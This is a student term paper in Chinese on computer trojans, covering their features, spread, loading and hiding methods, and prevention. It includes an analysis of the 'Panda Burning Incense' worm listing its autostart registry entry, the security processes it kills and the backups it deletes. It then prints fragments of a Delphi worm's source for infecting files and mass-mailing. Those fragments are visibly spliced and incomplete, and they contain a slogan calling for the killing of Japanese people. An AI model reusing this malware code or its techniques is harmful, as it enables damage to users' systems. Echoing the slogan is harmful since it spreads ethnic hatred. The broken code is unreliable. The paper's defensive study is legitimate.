木馬病毒的原理和預(yù)防論文

1、信息安全課程期末論文題 目 計算機木馬病毒的研究和預(yù)防措施 學(xué) 院 數(shù)學(xué)計算機學(xué)院 專 業(yè) 軟件工程 年 級 2011級 學(xué)生學(xué)號 12011242706 學(xué)生姓名 趙鴻偉 計算機木馬病毒的研究和預(yù)防措施摘 要隨著信息化時代的到來人類社會生活對因特網(wǎng)的需求日益增長，使得計算機網(wǎng)絡(luò)技術(shù)迅速發(fā)展和普及。因特網(wǎng)使得全世界都聯(lián)系到了一起。極大的促進(jìn)了全球一體化的發(fā)展。但是隨著互聯(lián)網(wǎng)的普及和應(yīng)用的不斷發(fā)展，各種黑客工具和網(wǎng)絡(luò)手段導(dǎo)致網(wǎng)絡(luò)和用戶收到財產(chǎn)損失，其中最嚴(yán)重的就是木馬攻擊手段。它以其攻擊范圍廣、危害大等特點成為常見的網(wǎng)絡(luò)攻擊技術(shù)之一，對整個互聯(lián)網(wǎng)照成了極大的危害。本文分析了木馬病毒的基本原理，針

2、對木馬病毒的特征、傳播途徑等分析結(jié)果，找出計算機感染病毒的原因。并且對木馬病毒的種類、加載技術(shù)及現(xiàn)狀進(jìn)行了詳細(xì)的研究，提出了完善的防范建議。關(guān)鍵詞：木馬病毒；網(wǎng)絡(luò)安全；自動加載；文件劫持；防護(hù)；措施AbstractWith the growing demand for information technology era of human social life on the Internet, computer network technology rapid development and popularization. The Internet makes the whole world

3、 is linked to together. Greatly contributed to the development of global integration. But with the popularity of the Internet and the continuous development of the application, a variety of hacking tools and network means the network and the user receives property damage, the most serious of which i

4、s Trojan attacks. With its wide range of attacks, hazards and other characteristics to become one of the common network attack techniques, the entire Internet according to become great harm.Keywords: Trojan; network security; Automatically loaded ；File hijacked ;protective;measures目錄引言11 木馬病毒的概述1 1.

5、1木馬病毒的基本特征1 1.2木馬病毒的傳播途徑2 1.3木馬病毒病毒的危害22 木馬病毒的現(xiàn)狀3 2.1特洛伊木馬的發(fā)展4 2.2 木馬病毒的種類43 木馬病毒的基本原理5 3.1木馬病毒的加載技術(shù)8 3.1.1 系統(tǒng)啟動自動加載8 3.1.2 文件劫持8 3.2 木馬病毒的隱藏技術(shù)84 “熊貓燒香”病毒剖析9 5 木馬病毒的防范14 5.1基于用戶的防范措施15 5.2基于服務(wù)器端的防范措施17 5.3加強計算機網(wǎng)絡(luò)管理18總結(jié)19參考文獻(xiàn)19引言 本文簡單的介紹木馬病毒的制作原理和防護(hù)措施，讓大家對木馬病毒的基本了解。所謂知己知彼方能百戰(zhàn)百勝，我們要是學(xué)會了木馬病毒的制作原理和目的，這樣

6、對我們來說計算機病毒就不是那么深奧了，難以琢磨了。我們把計算機木馬病毒的特性，生理周期，傳播情況，主要危害，和他的分類弄清楚了，我們才能對癥下藥. 雖然計算機病毒正隨著科技的進(jìn)步而飛快的發(fā)展，但是我們只要把他的工作原理弄清楚了，再加以對計算機病毒的不斷認(rèn)識，我們就不必要為止恐慌了，下面就有請看主題:1 木馬病毒的概述及概述 1.1木馬的的定義木馬的全稱是“特洛伊木馬”，是一種新型的計算機網(wǎng)絡(luò)病毒程序，是一種基于遠(yuǎn)程控制的黑客工具，它利用自身具有的植入功能，或依附具有傳播功能的病毒，進(jìn)駐目標(biāo)機器監(jiān)聽、修改。竊取文件。1.2木馬的基本特征1、隱蔽性是其首要的特征當(dāng)用戶執(zhí)行正常程序時，在難以察覺的情

7、況下，完成危害影虎的操作，具有隱蔽性。它的隱蔽性主要體現(xiàn)在6個方面：1.不產(chǎn)生圖標(biāo)、2.文件隱藏、3.在專用文件夾中隱藏、4.自動在任務(wù)管理其中隱形、5.無聲無息的啟動、6.偽裝成驅(qū)動程序及動態(tài)鏈接庫 2、它具有自動運行性它是一個當(dāng)你系統(tǒng)啟動時即自動運行的程序，所以它必需潛入在你的啟動配置文件中，如win.ini、system.ini、winstart.bat以及啟動組等文件之中。 3、木馬程序具有欺騙性木馬程序要達(dá)到其長期隱蔽的目的，就必需借助系統(tǒng)中已有的文件，以防被你發(fā)現(xiàn)，它經(jīng)常使用的是常見的文件名或擴展名，如“dllwinsysexplorer等字樣，或者仿制一些不易被人區(qū)別的文件名，如

8、字母“l(fā)”與數(shù)字“1”、字母“o”與數(shù)字“0”，常修改基本文件中的這些難以分辨的字符，更有甚者干脆就借用系統(tǒng)文件中已有的文件名，只不過它保存在不同路徑之中。還有的木馬程序為了隱藏自己，也常把自己設(shè)置成一個ZIP文件式圖標(biāo)，當(dāng)你一不小心打開它時，它就馬上運行。等等這些手段那些編制木馬程序的人還在不斷地研究、發(fā)掘，總之是越來越隱蔽，越來越專業(yè)，所以有人稱木馬程序為“騙子程序”。 4、具備自動恢復(fù)功能現(xiàn)在很多的木馬程序中的功能模塊已不再是由單一的文件組成，而是具有多重備份，可以相互恢復(fù)。5、能自動打開端口應(yīng)服務(wù)器客戶端的通信手段，利用TCP/IP協(xié)議不常用端口自動進(jìn)行連接，開方便之“門” 6、功能的

9、特殊性通常的木馬的功能都是十分特殊的，除了普通的文件操作以外，還有些木馬具有搜索cache中的口令、設(shè)置口令、掃描目標(biāo)機器人的IP地址、進(jìn)行鍵盤記錄、遠(yuǎn)程注冊表的操作、以及鎖定鼠標(biāo)等功能,上面所講的遠(yuǎn)程控制軟件的功能當(dāng)然不會有的，畢竟遠(yuǎn)程控制軟件是用來控制遠(yuǎn)程機器，方便自己操作而已，而不是用來黑對方的機器的。1.3木馬的傳播途徑1.利用操作系統(tǒng)和瀏覽器漏洞傳播。2.利用移動存儲設(shè)備（U盤）等來傳播。3.利用第三方軟件（如realplayer，迅雷，暴風(fēng)影音等）漏洞傳播4.利用ARP欺騙方式來傳播5利用電子郵件，QQ,MSN等通訊軟件傳播6.利用網(wǎng)頁掛馬，嵌入惡意代碼來傳播1.4木馬病毒的危害1

10、利用通訊軟件盜取用戶個人信息。黑客可以利用木馬病毒盜取用戶的如QQ,MSN等賬號進(jìn)行盜取用戶好友個人信息等。 2盜取網(wǎng)游賬號，威脅我們的虛擬財產(chǎn)安全黑客利用木馬病毒盜取用戶游戲賬戶密碼，并將用戶游戲中的裝備或游戲幣轉(zhuǎn)移，照成損失。3盜取用戶的網(wǎng)銀信息，威脅我們的真是財產(chǎn)安全黑客利用木馬，采用鍵盤記錄等方法盜取用戶的個人銀行信息，直接到市用戶的經(jīng)濟(jì)損失4給電腦打開后門，使電腦可能被黑客控制2木馬病毒的現(xiàn)狀 目前，木馬病毒結(jié)合了傳統(tǒng)病毒的破壞性，產(chǎn)生了更有危害性的混合型木馬病毒。有關(guān)報告顯示：截止2011年上半年，所截獲的新增病毒總計有111474種，而木馬病毒占總數(shù)的64.1%。其中，盜號木馬占

11、總木馬數(shù)的70%，從數(shù)據(jù)上可以看出，木馬數(shù)量的成倍增長，變種稱出不窮，使得計算機用戶的處境更加危險。2.1特洛伊木馬的發(fā)展計算機世界的特洛伊木馬(Trojan)是指隱藏在正常程序中的一段具有特殊功能的惡意代碼，是具備破壞和刪除文件、發(fā)送密碼、記錄鍵盤和攻擊Dos等特殊功能的后門程序。 第一代木馬 ：偽裝型病毒這種病毒通過偽裝成一個合法性程序誘騙用戶上當(dāng)。世界上第一個計算機木馬是出現(xiàn)在1986年的PC-Write木馬。它偽裝成共享軟件PC-Write的2.72版本（事實上，編寫PC-Write的Quicksoft公司從未發(fā)行過2.72版本），一旦用戶信以為真運行該木馬程序，那么他的下場就是硬盤被

12、格式化。在我剛剛上大學(xué)的時候，曾聽說我校一個前輩牛人在WAX機房上用BASIC作了一個登錄界面木馬程序，當(dāng)你把你的用戶ID，密碼輸入一個和正常的登錄界面一模一樣的偽登錄界面后后，木馬程序一面保存你的ID,和密碼，一面提示你密碼錯誤讓你重新輸入，當(dāng)你第二次登錄時，你已成了木馬的犧牲品。此時的第一代木馬還不具備傳染特征。 第二代木馬 ：AIDS型木馬 繼PC-Write之后，1989年出現(xiàn)了AIDS木馬。由于當(dāng)時很少有人使用電子郵件，所以AIDS的作者就利用現(xiàn)實生活中的郵件進(jìn)行散播：給其他人寄去一封封含有木馬程序軟盤的郵件。之所以叫這個名稱是因為軟盤中包含有AIDS和HIV疾病的藥品，價格，預(yù)防措

13、施等相關(guān)信息。軟盤中的木馬程序在運行后，雖然不會破壞數(shù)據(jù)，但是他將硬盤加密鎖死，然后提示受感染用戶花錢消災(zāi)?？梢哉f第二代木馬已具備了傳播特征（盡管通過傳統(tǒng)的郵遞方式）。 第三代木馬：網(wǎng)絡(luò)傳播性木馬 隨著Internet的普及，這一代木馬兼?zhèn)鋫窝b和傳播兩種特征并結(jié)合TCP/IP網(wǎng)絡(luò)技術(shù)四處泛濫。同時還有了兩個新特征，第一，添加了“后門”功能；第二，添加了擊鍵記錄功能；第三，有了視頻監(jiān)控和桌面監(jiān)控等功能。2.2 木馬病毒的種類種類特性傳播途徑破壞型唯一的功能就是破壞并且刪除文件，可以自動的刪除電腦上的DLL、INI、EXE文件硬盤傳播密碼發(fā)送型向密碼輸入窗口發(fā)送WM_SETTEXT消息模擬輸入密碼

14、，向按鈕窗口發(fā)送WM_COMMAND消息模擬單擊。在破解過程中，把密碼保存在一個文件中，以便在下一個序列的密碼再次進(jìn)行窮舉或多部機器同時進(jìn)行分工窮舉，直到找到密碼為止?？梢哉业诫[藏密碼并把它們發(fā)送到指定的信箱。也有些黑客軟件長期潛伏，記錄操作者的鍵盤操作，從中尋找有用的密碼。遠(yuǎn)程訪問型最廣泛的是特洛伊馬，只需有人運行了服務(wù)端程序，如果客戶知道了服務(wù)端的IP地址，就可以實現(xiàn)遠(yuǎn)程控制。通過控制internet的UDP協(xié)議進(jìn)行傳播。鍵盤記錄木馬這種特洛伊木馬是非常簡單的。它們只做一件事情，就是記錄受害者的鍵盤敲擊并且在LOG文件里查找密碼。潛伏在計算機硬盤中，通過記錄使用者的鍵盤操作進(jìn)行傳播。DoS

15、攻擊木馬隨著DoS攻擊越來越廣泛的應(yīng)用，被用作DoS攻擊的木馬也越來越流行起來。當(dāng)你入侵了一臺機器，給他種上DoS攻擊木馬，你控制的肉雞數(shù)量越多，你發(fā)動DoS攻擊取得成功的機率就越大。通過郵件傳播，一旦機器被感染，木馬就會隨機生成各種各樣主題的信件，對特定的郵箱不停地發(fā)送郵件，一直到對方癱瘓、不能接受郵件為止。代理木馬“代理木馬”具有自動下載木馬病毒的功能，一旦感染系統(tǒng)后，當(dāng)系統(tǒng)接入互聯(lián)網(wǎng)，再從指定的網(wǎng)址下載其他木馬、病毒等惡意軟件。它們可以根據(jù)病毒編者指定的網(wǎng)址下載木馬病毒或其他惡意軟件，還可以通過網(wǎng)絡(luò)和移動存儲介質(zhì)傳播。FTP木馬這種木馬可能是最簡單和古老的木馬了，它的唯一功能就是打開21

16、端口，等待用戶連接。控制用戶的21端口使其運行某一指定的命令。反彈端口型木馬木馬定時監(jiān)測控制端的存在，發(fā)現(xiàn)控制端上線立即彈出端口主動連結(jié)控制端打開的主動端口；即使用戶使用掃描軟件檢查自己的端口，發(fā)現(xiàn)類似TCP的情況。通過控制計算機防火墻端口進(jìn)行傳播。3 木馬病毒的基本原理 木馬病毒通常飽飯兩個部分：服務(wù)器和客戶端。服務(wù)端植入危害主機，而施種者利用客戶端侵入運行了服務(wù)端的主機。木馬的服務(wù)端一旦啟動，受害主機的一個或幾個端口即對施種者敞開，使得 施種者可以利用這些端口受害主機，開始執(zhí)行入侵操作。如圖：圖表 1 木馬病毒傳播基本原理1、配置、傳播木馬一般來說一個設(shè)計成熟的木馬都有木馬配置程序，從具體

17、的配置內(nèi)容看，主要是為了實現(xiàn)偽裝和信息反饋兩方面的功能。傳播方式: 木馬的傳播方式主要有兩種:一種是通過E-MAIL,控制端將木馬程序以附件的形式夾在郵件中發(fā)送出 去, 收信人只要打開附件系統(tǒng)就會感染木馬;另一種是軟件下載，一些非正規(guī)的網(wǎng)站以提供軟件下載為 名義， 將木馬捆綁在軟件安裝程序上，下載后，只要一運行這些程序，木馬就會自動安裝。 2、運行木馬服務(wù)端用戶運行木馬或捆綁木馬的程序后,木馬就會自動進(jìn)行安裝。首先將自身拷貝到WINDOWS的 系統(tǒng)文件夾中(C:WINDOWS或C:WINDOWSSYSTEM目錄下),然后在注冊表,啟動組,非啟動組中設(shè)置好木馬的觸發(fā)條件,這樣木馬的安裝就完成了。

18、木馬被激活后，進(jìn)入內(nèi)存，并開啟事先定義的木馬端口，準(zhǔn)備與控制端建立連接。這時服務(wù)端用 戶可以在MS-DOS方式下，鍵入NETSTAT -AN查看端口狀態(tài)，一般個人電腦在脫機狀態(tài)下是不會有端口 開放的，如果有端口開放，你就要注意是否感染木馬了。3、信息反饋木馬配置程序?qū)⒕托畔⒎答伒姆绞交虻刂愤M(jìn)行設(shè)置，如設(shè)置信息反饋的郵件地址，IRC號 ，ICO號等等。4、建立連接一個木馬連接的建立首先必須滿足兩個條件：一是服務(wù)端已安裝了木馬程序；二是控制端，服務(wù)端都要在線。在此基礎(chǔ)上控制端可以通過木馬端口與服務(wù)端建立連接值得一提的要掃描整個IP地址段顯然費時費力，一般來說控制端都是先通過信息反饋獲得服務(wù)端的IP

19、地址，由于撥號上網(wǎng)的IP是動態(tài)的，即用戶每次上網(wǎng)的IP都是不同的。5、遠(yuǎn)程控制木馬連接建立后，控制端端口和木馬端口之間將會出現(xiàn)一條通道，控制端上的控制端程序可藉這條通道與服務(wù)端上的木馬程序取得聯(lián)系,并通過木馬程序?qū)Ψ?wù)端進(jìn)行遠(yuǎn)程控制。6、木馬病毒的傳播及植入由于木馬病毒是一種非自我復(fù)制的惡意代碼，因此她需要依靠用戶向其他人發(fā)送其拷貝。木馬病毒可以作為電子郵件附件或者隱藏在用戶與其他用戶進(jìn)行交互的文檔或者其他文件中。他們還可以被其他惡意代碼所攜帶，如蠕蟲。木馬病毒有時也會隱藏在從互聯(lián)網(wǎng)上下載的捆綁軟件中。當(dāng)用戶安裝此軟件是，病毒就會在后臺秘密安裝。木馬植入技術(shù)主要是指木馬病毒利用各自途徑進(jìn)入到目

20、標(biāo)機器的具體方法。7、木馬病毒植入技術(shù)木馬病毒植入技術(shù),主要是指木馬病毒利用各種途徑進(jìn)入目標(biāo)機器的具體實現(xiàn)方法。(1)利用電子郵件進(jìn)行傳播:攻擊者將木馬程序偽裝成E-mail附件的形式發(fā)送過去,收信方只要查看郵件附件就會使木馬程序得到運行并安裝進(jìn)入系統(tǒng)。(2)利用網(wǎng)絡(luò)下載進(jìn)行傳播:一些非正規(guī)的網(wǎng)站以提供軟件下載為名,將木馬捆綁在軟件安裝程序上,下載后,只要運行這些程序,木馬就會自動安裝。(3)利用網(wǎng)頁瀏覽傳播:這種方法利用Java Applet編寫出一個HTML網(wǎng)頁,當(dāng)我們?yōu)g覽該頁面時,JavaApplet會在后臺將木馬程序下載到計算機緩存中,然后修改注冊表,使指向木馬程序。(4)利用一些漏洞

21、進(jìn)行傳播:如微軟著名的IIS服務(wù)器溢出漏洞,通過一個IISHACK攻擊程序即可把IIS服務(wù)器崩潰,并且同時在受控服務(wù)器執(zhí)行木馬程序。由于微軟的瀏覽器在執(zhí)行Script腳本上存在一些漏洞,攻擊者可以利用這些漏洞傳播病毒和木馬,甚至直接對瀏覽者主機進(jìn)行文件操作等控制。(5)遠(yuǎn)程入侵進(jìn)行傳播:黑客通過破解密碼和建立IPC遠(yuǎn)程連接后登陸到目標(biāo)主機,將木馬服務(wù)端程序拷貝到計算機中的文件夾(一般在C:WINDOWSsystem32或者C:WINNTsys-tem32)中,然后通過遠(yuǎn)程操作讓木馬程序在某一個時間運行。(6)基于DLL和遠(yuǎn)程線程插入的木馬植入：這種傳播技術(shù)是以DLL的形式實現(xiàn)木馬程序,然后在目

22、標(biāo)主機中選擇特定目標(biāo)進(jìn)程(如系統(tǒng)文件或某個正常運行程序),由該進(jìn)程將木馬DLL植入到本系統(tǒng)中。(7)利用蠕蟲病毒傳播木馬:網(wǎng)絡(luò)蠕蟲病毒具有很強的傳染性和自我復(fù)制能力,將木馬和蠕蟲病毒結(jié)合在一起就可以大大地提高木馬的傳播能力。結(jié)合了蠕蟲病毒的木馬利用病毒的特性,在網(wǎng)絡(luò)上進(jìn)行傳播、復(fù)制,這就加快了木馬的傳播速度。3.1木馬病毒的加載技術(shù)當(dāng)木馬病毒成功植入目標(biāo)機后,就必須確保自己可以通過某種方式得到自動運行。常見的木馬病毒加載技術(shù)主要包括:系統(tǒng)啟動自動加載、文件關(guān)聯(lián)和文件劫持等。3.1.1 系統(tǒng)啟動自動加載系統(tǒng)啟動自動加載，這是最常的木馬自動加載方法。木馬病毒通過將自己拷貝到啟動組,或在win.in

23、i,system.ini和注冊表中添加相應(yīng)的啟動信息而實現(xiàn)系統(tǒng)啟動時自動加載。這種加載方式簡單有效,但隱蔽性差。目前很多反木馬軟件都會掃描注冊表的啟動鍵(信息),故而新一代木馬病毒都采用了更加隱蔽的加載方式。3.1.2 文件劫持文件劫持，是一種特殊的木馬加載方式。木馬病毒被植入到目標(biāo)機后,需要首先對某個系統(tǒng)文件進(jìn)行替換或嵌入操作,使得該系統(tǒng)文件在獲得訪問權(quán)之前,木馬病毒被率先執(zhí)行,然后再將控制權(quán)交還給相應(yīng)的系統(tǒng)文件。采用這種方式加載木馬不需要修改注冊表,從而可以有效地躲過注冊表掃描型反木馬軟件的查殺。這種方式最簡單的實現(xiàn)方法是將某系統(tǒng)文件改名,然后將木馬程序改名。這樣當(dāng)這個系統(tǒng)文件被調(diào)用的時候

24、,實際上是木馬程序被運行,而木馬啟動后,再調(diào)用相應(yīng)的系統(tǒng)文件并傳遞原參數(shù)。3.2 木馬病毒的隱藏技術(shù)為確保有效性,木馬病毒必須具有較好的隱蔽性。木馬病毒的主要隱蔽技術(shù)包括:偽裝、進(jìn)程隱藏、DLL技術(shù)等。偽裝,從某種意義上講,偽裝是一種很好的隱藏。木馬病毒的偽裝主要有文件偽裝和進(jìn)程偽裝。前者除了將文件屬性改為隱藏之外,大多通過采用一些比較類似于系統(tǒng)文件的文件名來隱蔽自己;而后者則是利用用戶對系統(tǒng)了解的不足,將自己的進(jìn)程名設(shè)為與系統(tǒng)進(jìn)程類似而達(dá)到隱藏自己的目的。進(jìn)程隱藏,木馬病毒進(jìn)程是它駐留在系統(tǒng)中的最好證據(jù),若能夠有效隱藏自己的進(jìn)程,顯然將大大提高木馬病毒的隱蔽性。在windows98系統(tǒng)中可以

25、通過將自己設(shè)為系統(tǒng)進(jìn)程來達(dá)到隱藏進(jìn)程的目的。但這種方法在windows2000/NT下就不再有效,只能通過下面介紹的DLL技術(shù)或設(shè)備驅(qū)動技術(shù)來實現(xiàn)木馬病毒的隱藏。DLL技術(shù),采用DLL技術(shù)實現(xiàn)木馬的隱蔽性,主要通過以下兩種途徑:DLL陷阱和DLL注入。DLL陷阱技術(shù)是一種針對DLL(動態(tài)鏈接庫)的高級編程技術(shù),通過用一個精心設(shè)計的DLL替換已知的系統(tǒng)DLL或嵌入其內(nèi)部,并對所有的函數(shù)調(diào)用進(jìn)行過濾轉(zhuǎn)發(fā)。DLL注入技術(shù)是將一個DLL注入到某個進(jìn)程的地址空間,然后潛伏在其中并完成木馬的操作。4 “熊貓燒香”病毒剖析 “熊貓燒香”病毒感染機理:“熊貓燒香”，是一個感染型的蠕蟲病毒，它能感染系統(tǒng)中exe

26、，com，pif，src，html，asp等文件，它還能中止大量的反病毒軟件進(jìn)程并且會刪除擴展名為gho的文件，該文件是一系統(tǒng)備份工具GHOST的備份文件，使用戶的系統(tǒng)備份文件丟失。被感染的用戶系統(tǒng)中所有.exe可執(zhí)行文件全部被改成熊貓舉著三根香的模樣。 1:拷貝文件病毒運行后,會把自己拷貝到C:WINDOWSSystem32Driversspoclsv.exe 2:添加注冊表自啟動病毒會添加自啟動項HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun svcshare -> C:WINDOWSSystem32Drivers

27、spoclsv.exe 3:病毒行為a:每隔1秒尋找桌面窗口,并關(guān)閉窗口標(biāo)題中含有以下字符的程序： QQKav、QQAV、防火墻、進(jìn)程、VirusScan、網(wǎng)鏢、殺毒、毒霸、瑞星、江民、黃山IE、超級兔子、優(yōu)化大師、木馬克星、木馬清道夫、QQ病毒、注冊表編輯器、系統(tǒng)配置實用程序、卡巴斯基反病毒、Symantec AntiVirus、Duba、esteem proces、綠鷹PC、密碼防盜、噬菌體、木馬輔助查找器、System Safety Monitor、Wrapped gift Killer、Winsock Expert、游戲木馬檢測大師、msctls_statusbar32、pjf(ust

28、c)、IceSword，并使用的鍵盤映射的方法關(guān)閉安全軟件IceSword。添加注冊表使自己自啟動HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun svcshare -> C:WINDOWSSystem32Driversspoclsv.exe并中止系統(tǒng)中以下的進(jìn)程: Mcshield.exe、VsTskMgr.exe、naPrdMgr.exe、UpdaterUI.exe、TBMon.exe、scan32.exe、Ravmond.exe、CCenter.exe、RavTask.exe、Rav.exe、Ravmon.exe、

29、RavmonD.exe、RavStub.exe、KVXP.kxp、kvMonXP.kxp、KVCenter.kxp、KVSrvXP.exe、KRegEx.exe、UIHost.exe、TrojDie.kxp、FrogAgent.exe、Logo1_.exe、Logo_1.exe、Rundl132.exe。b:每隔18秒點擊病毒作者指定的網(wǎng)頁,并用命令行檢查系統(tǒng)中是否存在共享，共存在的話就運行net share命令關(guān)閉admin$共享。c:每隔10秒下載病毒作者指定的文件,并用命令行檢查系統(tǒng)中是否存在共享，共存在的話就運行net share命令關(guān)閉admin$共享。d:每隔6秒刪除安全軟件在注冊

30、表中的鍵值。并修改以下值不顯示隱藏文件 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL CheckedValue -> 0x00 刪除以下服務(wù): navapsvc、wscsvc、KPfwSvc、SNDSrvc、ccProxy、ccEvtMgr、ccSetMgr、SPBBCSvc、Symantec Core LC、NPFMntor MskService、FireSvc。e:感染文件 病毒會感染擴展名為exe,pif,com,src的文件,把自己附加到文件的

31、頭部，并在擴展名為htm,html, asp,php,jsp,aspx的文件中添加一網(wǎng)址，用戶一但打開了該文件，IE就會不斷的在后臺點擊寫入的網(wǎng)址，達(dá)到增加點擊量的目的,但病毒不會感染以下文件夾名中的文件： WINDOW、Winnt、System Volume Information、Recycled、Windows NT、WindowsUpdate、Windows Media Player、Outlook Express、Internet Explorer、NetMeeting、Common Files、ComPlus Applications、Messenger、InstallShield

32、 Installation Information、MSN、Microsoft Frontpage、Movie Maker、MSN Gamin Zone 。g:刪除文件 病毒會刪除擴展名為gho的文件，該文件是一系統(tǒng)備份工具GHOST的備份文件使用戶的系統(tǒng)備份文件丟失。 “熊貓燒香”病毒核心源碼用 Delphi 寫 program Japussy; uses Windows, SysUtils, Classes, Graphics, ShellAPI, Registry; const HeaderSize = 82432; /病毒體的大小 IconOffset = $12EB8; /PE文件主

33、圖標(biāo)的偏移量 /在我的Delphi5 SP1上面編譯得到的大小，其它版本的Delphi可能不同 /查找2800000020的十六進(jìn)制字符串可以找到主圖標(biāo)的偏移量 HeaderSize = 38912; /Upx壓縮過病毒體的大小 IconOffset = $92BC; /Upx壓縮過PE文件主圖標(biāo)的偏移量 /Upx 1.24W 用法: upx -9 -8086 Japussy.exe IconSize = $2E8; /PE文件主圖標(biāo)的大小-744字節(jié) IconTail = IconOffset + IconSize; /PE文件主圖標(biāo)的尾部 ID = $44444444; /感染標(biāo)記 /垃圾

34、碼，以備寫入 Catchword = 'If a race need to be killed out, it must be Yamato. ' + 'If a country need to be destroyed, it must be Japan! ' + '* W32.Japussy.Worm.A *' $R *.RES Function RegisterServiceProcess()function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; std

35、call; external 'Kernel32.dll' /函數(shù)聲明 var TmpFile: string; Si: STARTUPINFO; Pi: PROCESS_INFORMATION; IsJap: Boolean = False; /日文操作系統(tǒng)標(biāo)記 判斷是否為Win9x Function IsWin9x()function IsWin9x: Boolean; var Ver: TOSVersionInfo; begin Result := False; Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo); if n

36、ot GetVersionEx(Ver) then Exit; if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then /Win9x Result := True; end; 在流之間復(fù)制 procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; dStartPos: Integer; Count: Integer); var LoopFiles(Path + SubDir.Stringsi + '', Mask); FreeAndNil(Su

37、bDir); end; 遍歷磁盤上所有的文件 procedure InfectFiles; var DriverList: string; i, Len: Integer; begin if GetACP = 932 then /日文操作系統(tǒng) IsJap := True; /去死吧！ DriverList := GetDrives; /得到可寫的磁盤列表 Len := Length(DriverList); while True do /死循環(huán) begin for i := Len downto 1 do /遍歷每個磁盤驅(qū)動器 LoopFiles(DriverListi + ':

38、9;, '*.*'); /感染之 SendMail; /發(fā)帶毒郵件 Sleep(1000 * 60 * 5); /睡眠5分鐘 end; end; 主程序開始 begin if IsWin9x then /是Win9x RegisterServiceProcess(GetCurrentProcessID, 1) /注冊為服務(wù)進(jìn)程 else /WinNT begin /遠(yuǎn)程線程映射到Explorer進(jìn)程 /哪位兄臺愿意完成之？ end; /如果是原始病毒體自己 if CompareText(ExtractFileName(ParamStr(0), 'Japussy.exe&

39、#39;) = 0 then InfectFiles /感染和發(fā)郵件 else /已寄生于宿主程序上了，開始工作 begin TmpFile := ParamStr(0); /創(chuàng)建臨時文件 Delete(TmpFile, Length(TmpFile) - 4, 4); TmpFile := TmpFile + #32 + '.exe' /真正的宿主文件，多一個空格 ExtractFile(TmpFile); /分離之 FillStartupInfo(Si, SW_SHOWDEFAULT); CreateProcess(PChar(TmpFile), PChar(TmpFile

40、), nil, nil, True, 0, nil, '.', Si, Pi); /創(chuàng)建新進(jìn)程運行之 InfectFiles; /感染和發(fā)郵件 end;End.5木馬病毒的防范 計算機病毒的防范措施針對病毒的發(fā)展趨勢, 從上面的討論知道木馬程序是非常危險的，計算機一旦感染病毒是非常危險的，所以在前人研究的基礎(chǔ)上我認(rèn)為以下幾種方法也有助于病毒的防范。如：（1）不隨意打開來歷不明的郵件，阻塞可疑郵件。（2）不隨意下載來歷不明的軟件。（3）及時修補漏洞和關(guān)閉可疑的端口。（4）盡量少用共享文件夾。（5）運行實時監(jiān)控系統(tǒng)。（6）經(jīng)常升級系統(tǒng)和更新殺毒軟件。（7）限制不必要的具有

41、傳輸能力的文件。（8）關(guān)閉不常使用端口。我國計算機網(wǎng)絡(luò)安全形勢十分嚴(yán)峻, 采用有效的病毒防范措施顯得尤其重要。計算機網(wǎng)絡(luò)中最主要的軟硬件實體就是服務(wù)器和工作站, 防治病毒首先要考慮這兩部分: 5.1基于用戶的防范措施（1）在網(wǎng)絡(luò)接口卡上安裝防病毒芯片。是一種硬件防病毒技術(shù)，與操作系統(tǒng)相配合，可以防范大部分針對緩沖區(qū)溢出漏洞的攻擊。Intel的防病毒技術(shù)是EDB，AMD的防病毒技術(shù)是EV，但不管叫什么，它們的原理都是大同小異的。嚴(yán)格來說，目前各個CPU廠商在CPU內(nèi)部集成的防病毒技術(shù)不能稱之為“硬件防毒”。這樣可以更加實時有效地保護(hù)工作站及通向服務(wù)器的橋梁。（2）創(chuàng)建緊急引導(dǎo)

42、盤和最新緊急修復(fù)盤。緊急引導(dǎo)盤就是常說的啟動盤，當(dāng)電腦無法進(jìn)入操作系統(tǒng)時，可以用它引導(dǎo)系統(tǒng)，進(jìn)入dos狀態(tài)，然后對系統(tǒng)進(jìn)行各種修復(fù)。計算機病毒的防治措施中創(chuàng)建的緊急修復(fù)盤是對當(dāng)前計算機的分區(qū)表，引導(dǎo)區(qū)信息等重要信息進(jìn)行的備份，當(dāng)計算機的這些信息被病毒破壞后，可以通過這張盤進(jìn)行恢復(fù)，盡量減少損失。（3）盡量不用外來的軟件和閃盤, 用前要用最新正版的殺毒軟件查殺。正版殺毒軟件非常穩(wěn)定，不會出現(xiàn)各種未知問題，如病毒庫不能及時更新等；遇到疑問時可獲取殺毒軟件官方客服支持，以便及時解決問題；能及時的更新病毒庫和正版殺毒軟件版本，更為有效的防范網(wǎng)絡(luò)威脅；可避免因在不可靠的網(wǎng)站尋找破解等信息時候中毒或錯將惡

43、意軟件當(dāng)作破解補丁下載?？上硎芨喔玫陌踩?wù)，這些服務(wù)是破解或盜版殺毒軟件所不可能有的。能夠享受官方為正版用戶提供的增強服務(wù)，比如諾頓、邁克菲的數(shù)據(jù)在線存儲等（4）重要文件和數(shù)據(jù)不要安裝在系統(tǒng)盤上, 注意及時做好數(shù)據(jù)的備份。數(shù)據(jù)庫的數(shù)據(jù)全在電腦上，如果出現(xiàn)一些意外（系統(tǒng)崩潰，認(rèn)為破壞，硬盤損壞等），會造成數(shù)據(jù)丟失，而要數(shù)據(jù)恢復(fù)的話，需要花很多時間和金錢。（5）對計算機系統(tǒng)軟件及時安裝補丁程序, 檢查注冊表和內(nèi)存中可疑進(jìn)程。 系統(tǒng)必須打補丁，這是一個安全常識，現(xiàn)在的病毒最愛做的事情就是利用系統(tǒng)漏洞攻擊你的電腦，所以一位說可以不打補丁的朋友的說法是嚴(yán)重錯誤的，不過補丁也可以用360來打，應(yīng)該說

